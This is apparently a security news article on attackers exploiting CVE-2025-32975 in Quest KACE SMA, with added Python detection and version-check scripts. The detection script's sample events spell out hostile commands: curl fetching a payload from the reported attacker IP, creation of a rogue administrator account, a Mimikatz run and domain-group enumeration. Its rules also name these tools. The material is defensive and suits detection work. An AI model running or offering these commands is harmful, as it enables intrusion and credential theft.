Hackers Exploit Critical Quest KACE SMA Flaw CVE-2025-32975, Prompting Urgent Patch Action

Critical Vulnerability in Quest KACE SMA Exploited by Hackers

In March 2026, cybersecurity firm Arctic Wolf identified malicious activities targeting unpatched Quest KACE Systems Management Appliance (SMA) systems. These attacks exploited a severe security flaw, designated as CVE-2025-32975, which had been patched in May 2025.

Understanding CVE-2025-32975

CVE-2025-32975 is an authentication bypass vulnerability in Quest KACE SMA versions prior to 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4). This flaw allows attackers to impersonate legitimate users without valid credentials, potentially leading to full administrative control over the affected systems. The vulnerability arises from improper handling of the Single Sign-On (SSO) authentication mechanism, enabling unauthorized access through specially crafted requests.

Details of the Exploitation

Arctic Wolf’s observations from the week of March 9, 2026, revealed that threat actors exploited CVE-2025-32975 to gain administrative access to unpatched SMA systems exposed to the internet. The attackers executed remote commands to download and execute Base64-encoded payloads from an external server (216.126.225[.]156) using the curl command.

Subsequent actions by the attackers included:

– Creation of Additional Administrative Accounts: Utilizing runkbot.exe, a background process associated with the SMA Agent, the attackers created new administrative accounts.

– Windows Registry Modifications: Through PowerShell scripts, the attackers altered Windows Registry settings, likely for persistence or system configuration changes.

– Credential Harvesting: Tools like Mimikatz were employed to extract credentials from the compromised systems.

– System Reconnaissance: The attackers enumerated logged-in users and administrator accounts and executed commands such as net time and net group to gather information about the network environment.

– Access to Critical Infrastructure: Remote Desktop Protocol (RDP) access was obtained to backup infrastructures, including Veeam and Veritas, as well as domain controllers.
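The activity listed above leaves a recognisable trail in process-creation telemetry: curl reaching the reported address, the SMA Agent's runkbot.exe spawning account-creation commands, PowerShell registry edits, Mimikatz, and net group / net time enumeration. The following script is an added example (not code from Arctic Wolf or Quest) that runs simple detection rules over a handful of constructed process events; the event field names (host, parent, image, cmdline) and the sample lines are assumptions made for the example, and only the reported IP and tool names come from the article.

```python
"""Heuristic triage of process-creation events for the post-exploitation
chain described in the article.  Sample events below are constructed."""
import re
from dataclasses import dataclass

# The address as reported (defanged); re-fanged only so it matches raw log text.
REPORTED_IP = "216.126.225[.]156".replace("[.]", ".")


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str   # parent process image (assumed telemetry field)
    image: str    # process image (assumed telemetry field)
    cmdline: str  # full command line (assumed telemetry field)


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    cmdline: str


# (rule name, parent-image pattern or None, image pattern, command-line pattern)
# Image patterns are full-matched against the basename; command-line patterns are
# searched in "image cmdline" so a tool name in the image alone still matches.
RULES = [
    ("curl_to_reported_ip", None, r"curl(\.exe)?", re.escape(REPORTED_IP)),
    # SMA Agent background process spawning local account creation / admin group changes
    ("kace_agent_account_creation", r"runkbot\.exe", r"(cmd|net1?)(\.exe)?",
     r"\bnet1?\s+(user|localgroup)\b.*\s/add\b"),
    ("powershell_registry_modification", None, r"(powershell|pwsh)(\.exe)?",
     r"(Set-ItemProperty|New-ItemProperty|reg(\.exe)?\s+add)\b.*\b(HKLM|HKCU|HKEY_)"),
    ("credential_dumping_tool", None, r".*", r"mimikatz"),
    ("network_enumeration", None, r"(cmd|net1?)(\.exe)?", r"\bnet1?\s+(time|group)\b"),
]


def _basename(path: str) -> str:
    """Strip any directory component so rules can match on the image name alone."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def _matches(rule, e: ProcEvent) -> bool:
    _, parent_re, image_re, cmd_re = rule
    if parent_re and not re.fullmatch(parent_re, _basename(e.parent), re.I):
        return False
    if not re.fullmatch(image_re, _basename(e.image), re.I):
        return False
    return re.search(cmd_re, f"{e.image} {e.cmdline}", re.I) is not None


def triage(events) -> list:
    """Return one Finding per (event, rule) pair that fires."""
    return [Finding(e.host, rule[0], e.cmdline)
            for e in events for rule in RULES if _matches(rule, e)]


def rule_counts(findings) -> dict:
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample telemetry: five suspicious events and two benign ones.
SAMPLE_EVENTS = [
    ProcEvent("sma-appliance", "sh", "curl", f"curl -s http://{REPORTED_IP}/p.txt -o /tmp/p.txt"),
    ProcEvent("ws01", r"C:\Program Files (x86)\Quest\KACE\runkbot.exe", "cmd.exe",
              "cmd.exe /c net user helpdesk2 /add && net localgroup administrators helpdesk2 /add"),
    ProcEvent("ws01", "runkbot.exe", "powershell.exe",
              r'powershell.exe -nop -c "Set-ItemProperty -Path HKLM:\SOFTWARE\Example -Name Flag -Value 1"'),
    ProcEvent("ws01", "cmd.exe", "mimikatz.exe", "mimikatz.exe"),
    ProcEvent("ws01", "cmd.exe", "net.exe", 'net group "Domain Admins" /domain'),
    ProcEvent("ws02", "explorer.exe", "net.exe", r"net use Z: \\fs01\share"),      # benign
    ProcEvent("ws02", "svchost.exe", "curl.exe", "curl.exe https://updates.example.com/m.json"),  # benign
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host:14} {f.rule:34} {f.cmdline}")
```

The rules are deliberately narrow (the reported IP, the agent process as parent of account creation) so they fit the reported chain rather than generic admin activity; the two benign events show that ordinary curl and net use traffic does not fire them.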

Implications of the Attack

The exploitation of CVE-2025-32975 poses significant risks:

– Complete System Compromise: Attackers can gain full administrative control, allowing them to manipulate system configurations, deploy malware, and exfiltrate sensitive data.

– Credential Theft: Harvested credentials can be used for lateral movement within the network, leading to further system compromises.

– Disruption of Services: Unauthorized access to backup systems and domain controllers can result in data loss, service outages, and operational disruptions.

Recommendations for Mitigation

To protect against such exploits, administrators should:

1. Apply Security Patches Promptly: Ensure that Quest KACE SMA systems are updated to version 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), or 14.1.101 (Patch 4), or a later release on the same branch.

2. Restrict Internet Exposure: Avoid exposing SMA instances directly to the internet.

3. Monitor System Activity: Implement continuous monitoring to detect unauthorized access and unusual activities.

4. Enhance Authentication Mechanisms: Utilize multi-factor authentication and regularly review access controls.

5. Conduct Regular Security Audits: Periodically assess systems for vulnerabilities and compliance with security policies.
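Checking an appliance inventory against the fixed builds listed in the advisory is easy to get wrong because each release branch has its own threshold. The script below is an added example (not Quest's own tooling) that parses "major.minor.build" version strings, ignores trailing labels such as "(Patch 5)", and sorts hosts into vulnerable, patched and unknown; the fixed builds come from the article, while the inventory format and host names are assumptions made for the example. Branches the article does not list are reported as unknown rather than guessed.

```python
"""Classify Quest KACE SMA version strings against the fixed builds named in
the advisory.  Inventory entries below are constructed for this example."""
import re
from typing import Optional

# First fixed build per branch, as stated in the article: versions prior to these are affected.
FIXED_BUILDS = {
    (13, 0): 385,
    (13, 1): 81,
    (13, 2): 183,
    (14, 0): 341,   # 14.0.341 (Patch 5)
    (14, 1): 101,   # 14.1.101 (Patch 4)
}

# Accept "13.0.385", "14.0.341 (Patch 5)", or "v14.1.101"; only the three numbers matter.
_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> tuple:
    """Return (major, minor, build); raise ValueError on an unrecognised string."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised SMA version string: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)))


def is_patched(text: str) -> Optional[bool]:
    """True if at or above the fixed build for its branch, False if below,
    None if the branch is not covered by the advisory's list."""
    major, minor, build = parse_version(text)
    fixed = FIXED_BUILDS.get((major, minor))
    if fixed is None:
        return None
    return build >= fixed


def triage_inventory(inventory) -> dict:
    """Split (host, version) pairs into 'vulnerable', 'patched' and 'unknown' buckets."""
    result = {"vulnerable": [], "patched": [], "unknown": []}
    for host, version in inventory:
        state = is_patched(version)
        bucket = "unknown" if state is None else ("patched" if state else "vulnerable")
        result[bucket].append(host)
    return result


# Constructed inventory (assumed host names and versions).
SAMPLE_INVENTORY = [
    ("kace-prod-01", "14.0.341 (Patch 5)"),
    ("kace-prod-02", "14.0.340"),
    ("kace-dr-01", "13.2.183"),
    ("kace-lab-01", "13.0.384"),
    ("kace-legacy-01", "12.1.169"),   # branch not listed in the advisory
]

if __name__ == "__main__":
    for bucket, hosts in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{bucket:11} {', '.join(hosts) or '-'}")
```

Hosts in the "unknown" bucket should be checked against the vendor's own release notes rather than assumed safe; the article's list covers only the 13.0 through 14.1 branches.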

Conclusion

The exploitation of CVE-2025-32975 underscores the critical importance of timely patch management and robust security practices. Organizations must remain vigilant, ensuring that systems are updated and adequately protected against known vulnerabilities to prevent unauthorized access and potential data breaches.